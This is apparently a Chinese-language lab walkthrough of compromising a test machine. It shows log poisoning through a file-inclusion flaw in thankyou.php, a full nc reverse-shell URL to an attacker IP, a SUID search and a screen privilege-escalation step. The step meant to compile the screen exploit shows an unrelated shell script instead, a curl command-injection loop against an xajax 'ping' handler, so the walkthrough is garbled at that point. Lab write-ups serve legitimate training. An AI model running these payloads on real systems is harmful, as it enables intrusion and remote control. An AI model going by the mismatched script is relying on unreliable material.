使用 nmap 扫描端口

image.png
image.png

在 contact 填写完以后,返回一个 thankyou.php 有文件包含漏洞

image.png
image.png

!?怎么找到的??
大佬们通过扫目录,扫出来的结果去看了一下(字典实在是太大,我就不扫了,白费劲)

发现这个页面每次加载都是不一样的,然后

image.png
image.png
image.png
image.png

在 thankyou.php 也有这样的情况,所以有理由怀疑是 thankyou.php 包含了这个文件

image.png
image.png

同时 fuzz 试出来一个 file 参数,mark 一下,收集一些字典整理一下,好久之前就应该做这个事情了
在扫描端口阶段注意到这是个 nginx 的服务,通过包含日志文件来 getshell

带着这个访问:

image.png
image.png

然后如包含日志文件 /var/log/nginx/access.log,同时可以跟上命令了

image.png
image.png

那既然这样,就 nc 反弹一个 shell 把,在 kali 上监听一个 6666 端口
nc -lvp 6666

浏览器访问一下就连上了,192.168.149.163/thankyou.php?file=/var/log/nginx/access.log&yichen=nc 192.168.149.141 6666 -c /bin/bash

image.png
image.png

提权

suid 提权:find / -user root -perm -4000 -print 2>/dev/null
先看一下有没有能用的

image.png
image.png

搜一下 searchsploit screen

image.png
image.png

分别把两个 C 语言文件拷出来,按照 sh 脚本的命令编译好了(然后把前面的去掉就可以了)

1
2
3
4
5
6
#!/bin/sh
echo $0;URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

用 vi 打开该 sh 文件,使用 :set ff=unix 保存
然后再通过 nc 传过去

image.png
image.png

执行脚本提权

image.png
image.png